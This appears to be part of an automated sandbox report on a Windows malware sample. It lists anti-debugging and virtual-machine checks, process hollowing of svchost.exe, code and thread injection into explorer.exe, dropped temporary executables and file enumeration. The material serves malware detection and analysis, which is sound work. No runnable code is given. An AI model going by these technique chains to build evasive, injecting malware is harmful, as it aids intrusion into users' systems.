      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF683970138 FindFirstFileW,CreateDirectoryW,CopyFileW,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,11_2_00007FF683970138
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF6839706C8 FindFirstFileW,CreateDirectoryW,CopyFileW,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,11_2_00007FF6839706C8
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF6839709A4 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,FindClose,11_2_00007FF6839709A4
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF68396DDD8 wsprintfW,FindFirstFileW,wsprintfW,PathFindExtensionW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,wsprintfW,FindNextFileW,FindClose,11_2_00007FF68396DDD8
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF683961B60 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,11_2_00007FF683961B60
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: 0_2_00007FF795D11420 GetSystemInfo,0_2_00007FF795D11420
      Source: C:\Windows\System32\svchost.exeThread delayed: delay time: 50000Jump to behavior
      Source: C:\Windows\System32\svchost.exeThread delayed: delay time: 60000Jump to behavior
      Source: C:\Windows\System32\svchost.exeThread delayed: delay time: 60000Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\AcrobatJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\CacheJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\FilesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DCJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIAJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Adobe\AcrobatJump to behavior
      Source: explorer.exe, 00000003.00000002.3343563900.0000000009B7C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
      Source: explorer.exe, 00000003.00000002.3339715609.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
      Source: tmp1946.exe, 0000000B.00000002.2550280470.000001DEDDD54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllNT
      Source: explorer.exe, 00000003.00000003.3094406378.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2113623641.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3343563900.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0r
      Source: explorer.exe, 00000003.00000002.3343563900.0000000009B7C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
      Source: explorer.exe, 00000003.00000002.3343563900.0000000009B7C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
      Source: explorer.exe, 00000003.00000000.2113623641.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
      Source: explorer.exe, 00000003.00000002.3343563900.0000000009B7C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000003.00000002.3337758114.0000000003554000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
      Source: explorer.exe, 00000003.00000002.3343563900.0000000009B7C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
      Source: explorer.exe, 00000003.00000002.3337758114.0000000003554000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 d9 2e dc 89 72 dX
      Source: explorer.exe, 00000003.00000000.2103838610.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
      Source: explorer.exe, 00000003.00000002.3339715609.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
      Source: explorer.exe, 00000003.00000003.3094406378.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2113623641.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3343563900.0000000009B2C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: explorer.exe, 00000003.00000002.3337758114.0000000003554000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
      Source: explorer.exe, 00000003.00000002.3337758114.0000000003554000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware,p
      Source: explorer.exe, 00000003.00000002.3343563900.0000000009B7C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
      Source: explorer.exe, 00000003.00000002.3343563900.0000000009B7C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
      Source: explorer.exe, 00000003.00000000.2103838610.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
      Source: explorer.exe, 00000003.00000000.2113623641.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000003.00000000.2106502490.000000000769A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: C:\Users\user\Desktop\52kYJGCon6.exeAPI call chain: ExitProcess graph end nodegraph_0-19122
      Source: C:\Users\user\Desktop\52kYJGCon6.exeAPI call chain: ExitProcess graph end nodegraph_0-20459
      Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end nodegraph_3-31647
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeAPI call chain: ExitProcess graph end nodegraph_4-19120
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeAPI call chain: ExitProcess graph end nodegraph_4-20460
      Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end nodegraph_5-19683
      Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end nodegraph_5-20473
      Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end nodegraph_5-19159
      Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end nodegraph_5-19150
      Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end node
      Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end node
      Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end node
      Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end node
      Source: C:\Windows\System32\svchost.exeProcess information queried: ProcessInformationJump to behavior

      Anti Debugging

      barindex
      Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: 0_2_00007FF795D30150 IsDebuggerPresent,GetCurrentProcess,CheckRemoteDebuggerPresent,0_2_00007FF795D30150
      Found API chain indicative of debugger detection
      Source: C:\Users\user\Desktop\52kYJGCon6.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleepgraph_0-19593
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleepgraph_4-19592
      Source: C:\Windows\System32\svchost.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleepgraph_5-19612
      Source: C:\Users\user\Desktop\52kYJGCon6.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: 0_2_00007FF795D30150 IsDebuggerPresent,GetCurrentProcess,CheckRemoteDebuggerPresent,0_2_00007FF795D30150
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: 0_2_00007FF795D3A4A0 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00007FF795D3A4A0
      Source: C:\Windows\explorer.exeCode function: 3_2_10A57E80 CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,Thread32Next,CloseHandle,3_2_10A57E80
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: 0_2_00007FF795D2DFBC LoadLibraryA,GetProcAddress,0_2_00007FF795D2DFBC
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: 0_2_00007FF795D2EF58 InternetOpenW,Sleep,InternetOpenUrlW,InternetOpenUrlW,InternetCloseHandle,Sleep,HttpQueryInfoA,InternetCloseHandle,InternetCloseHandle,Sleep,InternetCloseHandle,InternetOpenUrlW,InternetCloseHandle,Sleep,HttpQueryInfoA,GetProcessHeap,HeapAlloc,InternetCloseHandle,InternetCloseHandle,InternetReadFile,InternetCloseHandle,InternetCloseHandle,0_2_00007FF795D2EF58
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: 0_2_00007FF795D3A24C SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF795D3A24C
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeCode function: 4_2_00007FF60E63A24C SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF60E63A24C
      Source: C:\Windows\System32\svchost.exeCode function: 5_2_00007FF60BFAA24C SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF60BFAA24C
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 6_2_00007FF7CA79BBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00007FF7CA79BBC0
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 6_2_00007FF7CA79C44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00007FF7CA79C44C
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 6_2_00007FF7CA7A9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00007FF7CA7A9924
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 6_2_00007FF7CA79C62C SetUnhandledExceptionFilter,6_2_00007FF7CA79C62C
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF7CA79BBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00007FF7CA79BBC0
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF7CA79C44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00007FF7CA79C44C
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF7CA7A9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00007FF7CA7A9924
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF7CA79C62C SetUnhandledExceptionFilter,9_2_00007FF7CA79C62C
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8B8370F20 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00007FF8B8370F20
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8B834A184 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00007FF8B834A184
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8BFB65054 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00007FF8BFB65054
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8BFB64A34 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00007FF8BFB64A34
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8BFB76810 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00007FF8BFB76810
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8BFB75DF8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00007FF8BFB75DF8
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8BFB769F8 SetUnhandledExceptionFilter,9_2_00007FF8BFB769F8
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8BFB9D414 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00007FF8BFB9D414
      Source: C:\Windows\System32\svchost.exeCode function: 10_2_00007FF69BEDA24C SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00007FF69BEDA24C
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF68393A760 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00007FF68393A760
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF68393ACE8 SetUnhandledExceptionFilter,11_2_00007FF68393ACE8
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF68393AB08 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00007FF68393AB08
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF683942F3C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00007FF683942F3C

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Benign windows process drops PE files
      Source: C:\Windows\System32\svchost.exeFile created: tmp8AEF.exe.2.drJump to dropped file
      Contains functionality to inject code into remote processes
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: 0_2_00007FF795D2F204 GetModuleFileNameW,CreateProcessW,CreateFileW,GetFileSize,CloseHandle,VirtualAlloc,CloseHandle,ReadFile,VirtualFree,CloseHandle,CloseHandle,GetThreadContext,VirtualFree,ReadProcessMemory,GetModuleHandleA,GetProcAddress,VirtualFree,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,WriteProcessMemory,VirtualFree,RtlCompareMemory,ReadProcessMemory,WriteProcessMemory,VirtualFree,WriteProcessMemory,SetThreadContext,VirtualFree,ResumeThread,VirtualFree,VirtualFree,0_2_00007FF795D2F204
      Contains functionality to inject threads in other processes
      Source: C:\Windows\explorer.exeCode function: 3_2_10A59110 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,3_2_10A59110
      Creates a thread in another existing process (thread injection)
      Source: C:\Windows\System32\svchost.exeThread created: C:\Windows\explorer.exe EIP: 8B70000Jump to behavior
      Injects a PE file into a foreign processes
      Source: C:\Windows\System32\svchost.exeMemory written: C:\Windows\explorer.exe base: 8B70535 value starts with: 4D5AJump to behavior
      Injects code into the Windows Explorer (explorer.exe)
      Source: C:\Windows\System32\svchost.exeMemory written: PID: 1028 base: 8B70000 value: 40Jump to behavior
      Source: C:\Windows\System32\svchost.exeMemory written: PID: 1028 base: 8B70535 value: 4DJump to behavior
      Maps a DLL or memory area into another process
      Source: C:\Users\user\Desktop\52kYJGCon6.exeSection loaded: NULL target: C:\Windows\System32\svchost.exe protection: readonlyJump to behavior
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeSection loaded: NULL target: C:\Windows\System32\svchost.exe protection: readonlyJump to behavior
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeSection loaded: NULL target: C:\Windows\System32\svchost.exe protection: readonlyJump to behavior
      Modifies the context of a thread in another process (thread injection)
      Source: C:\Users\user\Desktop\52kYJGCon6.exeThread register set: target process: 2520Jump to behavior
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeThread register set: target process: 7124Jump to behavior
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeThread register set: target process: 1272Jump to behavior
      Writes to foreign memory regions
      Source: C:\Users\user\Desktop\52kYJGCon6.exeMemory written: C:\Windows\System32\svchost.exe base: 108D9E3010Jump to behavior
      Source: C:\Windows\System32\svchost.exeMemory written: C:\Windows\explorer.exe base: 8B70000Jump to behavior
      Source: C:\Windows\System32\svchost.exeMemory written: C:\Windows\explorer.exe base: 8B70535Jump to behavior
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeMemory written: C:\Windows\System32\svchost.exe base: 68E4EE9010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeMemory written: C:\Windows\System32\svchost.exe base: EA24823010Jump to behavior
      Source: C:\Users\user\Desktop\52kYJGCon6.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSMJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\tmp8AEF.exe "C:\Users\user\AppData\Local\Temp\tmp8AEF.exe" Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\tmp1946.exe "C:\Users\user\AppData\Local\Temp\tmp1946.exe" Jump to behavior
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSMJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeProcess created: C:\Users\user\AppData\Local\Temp\tmp8AEF.exe "C:\Users\user\AppData\Local\Temp\tmp8AEF.exe" Jump to behavior
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSMJump to behavior
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: 0_2_00007FF795D2CCD4 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00007FF795D2CCD4
      Source: explorer.exe, 00000003.00000003.3094406378.0000000009B7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2113623641.0000000009B7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3343563900.0000000009B7C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd=
      Source: explorer.exe, 00000003.00000002.3336900452.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.2104545202.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
      Source: explorer.exe, 00000003.00000002.3339379976.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3336900452.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.2106079648.0000000004B00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000003.00000002.3336900452.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.2104545202.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000003.00000002.3336900452.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.2104545202.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
      Source: explorer.exe, 00000003.00000000.2103838610.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3335969864.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PProgman
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: 0_2_00007FF795D34534 cpuid 0_2_00007FF795D34534
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,_invoke_watson,_invoke_watson,0_2_00007FF795D3DD68
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_getptd,GetLocaleInfoEx,_invoke_watson,0_2_00007FF795D3D744
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: GetLocaleInfoEx,malloc,GetLocaleInfoEx,WideCharToMultiByte,free,0_2_00007FF795D3AA20
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: GetLocaleInfoEx,0_2_00007FF795D3DC64
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: EnumSystemLocalesEx,0_2_00007FF795D3AC1C
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,free,GetLocaleInfoEx,_invoke_watson,0_2_00007FF795D33B98
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP,0_2_00007FF795D3DBB0
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_00007FF795D3AB7C
      Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,3_2_10A7602C
      Source: C:\Windows\explorer.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,free,free,free,free,3_2_10A74060
      Source: C:\Windows\explorer.exeCode function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,3_2_10A76130
      Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,3_2_10A7C2F8
      Source: C:\Windows\explorer.exeCode function: _getptd,__lc_wcstolc,__get_qualified_locale,__lc_lctowcs,GetLocaleInfoEx,GetACP,3_2_10A6EA5C
